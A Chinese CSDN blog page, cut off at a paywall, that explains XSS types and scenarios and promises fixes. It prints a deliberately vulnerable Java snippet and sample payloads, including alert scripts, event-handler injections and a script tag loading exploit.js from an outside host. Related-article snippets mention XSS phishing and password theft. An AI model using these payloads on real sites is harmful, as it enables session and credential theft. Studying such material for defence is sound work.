怎么使用input执行xss攻击_XSS场景及修复方案总结

最新推荐文章于 2024-04-14 22:38:53 发布
最新推荐文章于 2024-04-14 22:38:53 发布
阅读量4.6k 收藏 4
点赞数
文章标签: 怎么使用input执行xss攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32562973/article/details/112770190
版权
本文详细介绍了XSS攻击的原理、分类和常见场景,包括恶意数据在标签内、属性内、特殊属性中和JavaScript变量及注释中的攻击方式,并提供了具体的攻击payload示例。同时,针对每个场景,文章给出了相应的防御方案,包括字符编码、过滤和安全编码实践。
摘要由CSDN通过智能技术生成

1bf52c1fc90bba9815e5a1970e8888b0.png

xss原理

跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其中Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。

xss分类

  1. 反射型
  2. 存储型
  3. DOM型

xss场景和防御

1. 恶意数据出现在标签内

<body>
...恶意数据
</body>

漏洞代码

String parameter = request.getParameter("xss");
response.getWriter().write("<body>"+parameter+"</body>");

攻击payload

攻击者可以使用的payload(以下每个种类列出代表性的一个)如下:

(1) js类

<script>alert(/xss/);</script>
<script src="http://www.test.com/exploit.js" ></script>
<script src="data:text/javascript,alert(1)"></script>

(2)事件类

<img src=1 onerror="javascript:alert(1)"></img>
<svg/onload=%26%23097lert%26lpar;1337)>

(3) 特殊属性类

<script src="
最低0.47元/天 解锁文章
卞小姐
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web登录页面代码_XSS实战之登录钓鱼网站后台
weixin_39974882的博客
12-10 2526
前言感觉最近被盗号的很多,好朋友账号被盗,我竟然傻乎乎的转了200大洋。本篇就以钓鱼为主题,只是让大家提升一下对盗号的认识和理解,让大家对于钓鱼盗号有所防范。XSS漏洞之前写过一篇文章讲解XSS漏洞分类以及危害,XSS是跨站脚本攻击,属于被动式的攻击。XSS指的是恶意攻击者往Web页面里插入恶意代码,当用户浏览该页之时,嵌入其中Web里面的恶意代码会被执行,从而达到特殊目的。最常见的就是...
跨站脚本漏洞
weixin_46729085的博客
09-08 3750
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
Hidden属性的input标签中XSS的触发方法
一生无悔惜缘的博客
08-18 8861
今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下: input type="hidden" name="returnurl" value="[USER INJECT]" />11 正常情况下的XSS应当是: http://victim/?value=” onclick=”alert(document.domain) 但是这里由于该
xss攻击原理与解决方法
最新发布
套路猿的博客
04-14 7万+
概述XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
XSS(跨站攻击)
知世郎
08-07 334
XSS 又称CSS(Cross Site Scripting)或跨站脚本攻击,攻击者在网页中插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行
XSS概念以及一些绕过方式
New Wh1te Hat
04-13 827
XSS概念 指前端代码不严谨,导致解析时出现漏洞,致使攻击者可以往Web页面里插入恶意html代码,当用户浏览该页时,嵌入其中Web里面的html代码会被执行,达到恶意的目的。攻击者利用WEB漏洞让服务器响应包携带恶意js代码导致管理员/用户访问时触发 XSS类型 反射型:把用户输入的数据反射给浏览器,欺骗用户自己去点击链接才能触发XSS代码,一般出现在搜索页面,提交按钮等。 存储型:一般会出现在网站的留言、评论、博客日志等交互处。恶意脚本被储存在客户端或者服务器的数据库中,当其他用户浏览该...
springboot2.x使用Jsoup防XSS攻击的实现
10-15
SpringBoot 2.x 使用 Jsoup 防XSS攻击的实现主要是为了保护应用程序免受跨站脚本(Cross-Site Scripting,简称XSS)的威胁。XSS攻击是一种常见且危害极大的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意...
关于pdf文件xss攻击问题,配置xssFilter方法
12-21
XSS攻击是通过在网页中注入可执行的脚本,当用户访问被注入脚本的页面时,这些脚本会在用户的浏览器环境中运行,从而可能执行攻击者设计的各种操作。PDF文件中的XSS攻击则是在PDF阅读器解析文档时触发恶意脚本,而...
XSS_Rays.zip_XSS Rays 下载_tool_xss扫描_xss扫描器_漏洞扫描
09-22
这tool有点意思,是使用JS写的,JS遍历目标的link、form,然后构造测试用例去测试,可以发现DOM的XSS(当然是在测试用例打对了的情况下)。它的调用方式也特别,在要测试的页面输入javascript:等代码引入JS就好了,...
XSS攻击常识及常见的XSS攻击脚本汇总.pdf
12-26
XSS攻击常识及常见的XSS攻击脚本汇总
XSS.zip_XSS_c xss
09-24
1. **反射型XSS(Non-Persistent XSS)**:也称为非持久性XSS,攻击代码包含在URL中,当用户点击链接或通过其他方式访问含有恶意代码的URL时,浏览器立即执行该脚本。 2. **存储型XSS(Persistent XSS)**:又称...
Input XSS最新漏洞及利用
06-12
我们知道,如果要使XSS能够实现,我们的代码必须通过某种方式嵌入到对方的网页中。像注入漏洞的“’”、“and 1=1”和“and 1=2”一样,Input XSS也有自己的漏洞检测字符串,它们就是“<>”、“<iframe>”和 “<script>alert(/xss/)</script>”。如果当你在Input框中输入“<>”,并在新 页面的源代码中找到这对标签的话,那么基本上就说明它存在Input XSS漏洞;而“<iframe>”则是它的可视化检测方式;如果“<script>alert(/xss/)< /script>”能够实现,则证明该页面可以实行脚本攻击,但是否可以被插入脚本,在本次的测试里亦不是非常重要,后面你将会知道。
XSS绕过方法总结
I_WORM的博客
01-31 1179
" < > & ' 等字符转为文本型实体编码PHP htmlspecialchars() 函数 | 菜鸟教程 (runoob.com)
怎么使用input执行xss攻击_萌新向 | 输入框因何频受攻击?
weixin_32401075的博客
01-08 2970
萌新向XSS漏洞导言:我们决定特别建立一个专辑,以帮助没有基础的人快速入门。该专辑与同样分为Web与二进制两项,但与公众号的专辑区别在于,我们将着重引导新生入门,讲述最简单、最基础的知识,事无巨细地讲述相关知识点与操作,即使你对计算机一无所知,我们也相信,你能跟随着我们的文章,满足你之前对于安全的一些想象。如果你对安全一无所知却又非常感兴趣,那么,我们的文章将会是你入门的最佳选择。我们的...
xss注入
qq_63267612的博客
07-03 1465
跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户目的。 XSS危害:XSS分类测试管理界面是否存在XSS: 在用户名框中输入">(闭合input标签) 结果,界面弹窗,证明该系统存在XSS注入 上一步验证得出,该页面存在XSS漏洞。接下来针对该漏洞
XSS学习 xss-Lab题解
qq_61768489的博客
02-12 2358
level 1 没有任何防护,直接url传xss name=<script>alert(1)</script> level2 有个input标签,尝试用"> 闭合标签 (在网页源代码中,我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签,然后在注入代码,闭合标签) "><script>alert(1)</script> level 3 测试发现尖括号被转换字...
如何获取提交后的input标签中的值_利用XSS获取用户明文账户密码
weixin_39821330的博客
12-03 359
我们知道在浏览器存在这样一个功能,当用户登录成功了一个网页后,浏览器会提示我们是否保存密码。如果我们点击同意,那么浏览器就会将账户及密码进行保存。当我们退出账户再次访问登录页面的时候,我们会发现浏览器已经将我们保存好了的账户及密码填写到了对应的输入框内。如图。那么浏览器是如何识别到这个网页并自动填充好密码的呢,首先,浏览器需要知道我们访问的这个域名是否有保存过账户及密码。然后他会去查询网...
第十四天xss漏洞
代码审计
03-18 393
css ==> 层叠样式表 xss ==> cross-site attack 跨站脚本攻击 1.什么叫做跨站 同源策略 无状态协议 服务器不会记录 用户是否登录 没有记忆能力 为了解决这个问题 引入cookie 2.脚本是什么脚本? js脚本 xss的分类 xss的不同种类之间的相同点以及不同点 反射型XSS又称非持久性XSS, 这种攻击往往具有一次性。 攻击者通过邮件等形式将包含XSS代码的链接发送给正常用户,当用户点击时,服务器接受该用户的请求并进行处理,然后把带有XS
XSS漏洞分析和防御
1ance's blog
05-03 1016
XSS:跨站脚本攻击(Cross Site Script) 形成原因是:未对用户输入的数据做好过滤,导致HTML页面被注入恶意脚本,从而在用户浏览网页时,被攻击者控制用户浏览器(反射一些用户信息如cookie等给攻击者)。 通常利用方法:XSS漏洞一般是通过php的输出函数将javascript的代码(恶意代码)输出到HTML页面,所以XSS漏洞关键是寻找参数未做过滤的输出函数。 php的常用输出: echo print() print_r() printf() sprintf() var_dump()
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值